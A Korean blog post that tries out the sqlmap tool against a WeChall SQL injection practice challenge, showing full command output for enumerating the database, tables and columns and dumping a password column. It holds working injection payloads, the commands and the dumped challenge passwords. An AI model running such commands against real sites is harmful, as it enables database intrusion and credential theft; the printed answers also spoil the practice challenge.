sqlmap – automatic SQL injection and database takeover tool

sqlmap 이란 툴이 트위터랑 페이스북에서 계속 언급되어 어떤것인가 하고 찾아서 사용해 봤습니다.
이것도 굉장한 자동화 도구네요. 아래는 간단하게 테스트 한 내용 입니다.

sqlmap : http://sqlmap.sourceforge.net/
메뉴얼 : http://sqlmap.sourceforge.net/doc/README.html
GUI for sqlmap (Linux) : http://code.google.com/p/gui-for-sqlmap/
GUI for sqlmap (Windows) : http://sourceforge.net/projects/sqlmapwin/

1. Database명 알아내기

[byjjoon@localhost sqlmap]$ ./sqlmap.py -u "http://www.wechall.net/challenge/table_names/challenge.php?username=test&password=test&login=login" --dbs

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 23:14:18

[23:14:19] [INFO] using '/home/byjjoon/sqlmap/output/www.wechall.net/session' as session file
[23:14:19] [INFO] testing connection to the target url
[23:14:21] [INFO] testing if the url is stable, wait a few seconds
[23:14:24] [WARNING] url is not stable, sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[23:14:33] [INFO] testing if GET parameter 'username' is dynamic
[23:14:35] [WARNING] GET parameter 'username' is not dynamic
[23:14:36] [WARNING] heuristic test shows that GET parameter 'username' might not be injectable
[23:14:36] [INFO] testing sql injection on GET parameter 'username'
[23:14:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:14:57] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[23:15:03] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[23:15:09] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[23:15:15] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[23:15:22] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[23:15:28] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[23:15:34] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[23:15:40] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[23:15:58] [INFO] GET parameter 'username' is 'MySQL > 5.0.11 AND time-based blind' injectable
[23:15:58] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[23:16:14] [INFO] target url appears to be UNION injectable with 3 columns
[23:16:22] [INFO] GET parameter 'username' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
GET parameter 'username' is vulnerable. Do you want to keep testing the others? [y/N] n
sqlmap identified the following injection points with a total of 59 HTTP(s) requests:
---
Place: GET
Parameter: username
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: username=-2809' UNION ALL SELECT CONCAT(CHAR(58,118,104,111,58),IFNULL(CAST(CHAR(103,99,77,75,81,100,99,101,89,70) AS CHAR),CHAR(32)),CHAR(58,119,118,101,58)), NULL, NULL# AND 'Pupu'='Pupu&password=test&login=login

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: username=test' AND SLEEP(5) AND 'zdxt'='zdxt&password=test&login=login
---

[23:16:32] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian or Ubuntu 6.0 (unstable sid or testing squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL 5.0.11
[23:16:32] [INFO] fetching database names
[23:16:34] [INFO] the SQL query used returns 2 entries
available databases [2]:
[*] gizmore_tableu61
[*] information_schema

[23:16:37] [INFO] Fetched data logged to text files under '/home/byjjoon/sqlmap/output/www.wechall.net'

[*] shutting down at: 23:16:37

2. Table명 알아내기

[byjjoon@localhost sqlmap]$ ./sqlmap.py -u "http://www.wechall.net/challenge/table_names/challenge.php?username=test&password=test&login=login" --tables -D gizmore_tableu61

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 23:17:25

[23:17:25] [INFO] using '/home/byjjoon/sqlmap/output/www.wechall.net/session' as session file
[23:17:26] [INFO] resuming injection data from session file
[23:17:26] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[23:17:26] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: username
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: username=-2809' UNION ALL SELECT CONCAT(CHAR(58,118,104,111,58),IFNULL(CAST(CHAR(103,99,77,75,81,100,99,101,89,70) AS CHAR),CHAR(32)),CHAR(58,119,118,101,58)), NULL, NULL# AND 'Pupu'='Pupu&password=test&login=login

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: username=test' AND SLEEP(5) AND 'zdxt'='zdxt&password=test&login=login
---

[23:17:28] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian or Ubuntu 6.0 (unstable sid or testing squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL 5.0.11
[23:17:28] [INFO] fetching tables for database 'gizmore_tableu61'
[23:17:29] [INFO] the SQL query used returns 2 entries
Database: gizmore_tableu61
[2 tables]
+--------------+
| aaawrong     |
| usertableus4 |
+--------------+

[23:17:33] [INFO] Fetched data logged to text files under '/home/byjjoon/sqlmap/output/www.wechall.net'

[*] shutting down at: 23:17:33

3. 칼럼명 알아내기

[byjjoon@localhost sqlmap]$ ./sqlmap.py -u "http://www.wechall.net/challenge/table_names/challenge.php?username=test&password=test&login=login" --columns -D gizmore_tableu61 -T usertableus4

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 23:19:12

[23:19:12] [INFO] using '/home/byjjoon/sqlmap/output/www.wechall.net/session' as session file
[23:19:12] [INFO] resuming injection data from session file
[23:19:12] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[23:19:12] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: username
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: username=-2809' UNION ALL SELECT CONCAT(CHAR(58,118,104,111,58),IFNULL(CAST(CHAR(103,99,77,75,81,100,99,101,89,70) AS CHAR),CHAR(32)),CHAR(58,119,118,101,58)), NULL, NULL# AND 'Pupu'='Pupu&password=test&login=login

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: username=test' AND SLEEP(5) AND 'zdxt'='zdxt&password=test&login=login
---

[23:19:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian or Ubuntu 6.0 (unstable sid or testing squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL 5.0.11
[23:19:14] [INFO] fetching columns for table 'usertableus4' on database 'gizmore_tableu61'
[23:19:16] [INFO] the SQL query used returns 3 entries
Database: gizmore_tableu61
Table: usertableus4
[3 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| message  | varchar(255) |
| password | varchar(64)  |
| username | varchar(32)  |
+----------+--------------+

[23:19:22] [INFO] Fetched data logged to text files under '/home/byjjoon/sqlmap/output/www.wechall.net'

[*] shutting down at: 23:19:22

4. 칼럼내의 데이터 알아내기

[byjjoon@localhost sqlmap]$ ./sqlmap.py -u "http://www.wechall.net/challenge/table_names/challenge.php?username=test&password=test&login=login" --dump -D gizmore_tableu61 -T usertableus4 -C password

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 23:21:37

[23:21:37] [INFO] using '/home/byjjoon/sqlmap/output/www.wechall.net/session' as session file
[23:21:37] [INFO] resuming injection data from session file
[23:21:37] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[23:21:37] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: username
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: username=-2809' UNION ALL SELECT CONCAT(CHAR(58,118,104,111,58),IFNULL(CAST(CHAR(103,99,77,75,81,100,99,101,89,70) AS CHAR),CHAR(32)),CHAR(58,119,118,101,58)), NULL, NULL# AND 'Pupu'='Pupu&password=test&login=login

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: username=test' AND SLEEP(5) AND 'zdxt'='zdxt&password=test&login=login
---

[23:21:39] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian or Ubuntu 6.0 (unstable sid or testing squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL 5.0.11
[23:21:39] [INFO] fetching columns 'password' entries for table 'usertableus4' on database 'gizmore_tableu61'
[23:21:41] [INFO] the SQL query used returns 5 entries
Database: gizmore_tableu61
Table: usertableus4
[5 entries]
+-----------------------------------+
| password                          |
+-----------------------------------+
| test                              |
| tables                            |
| themoreyouknowthemoreyoucanforget |
| tamethepenguin                    |
| thismypass                        |
+-----------------------------------+

[23:21:50] [INFO] Table 'gizmore_tableu61.usertableus4' dumped to CSV file '/home/byjjoon/sqlmap/output/www.wechall.net/dump/gizmore_tableu61/usertableus4.csv'
[23:21:50] [INFO] Fetched data logged to text files under '/home/byjjoon/sqlmap/output/www.wechall.net'

[*] shutting down at: 23:21:50

답글 남기기

이메일 주소는 공개되지 않습니다. 필수 필드는 *로 표시됩니다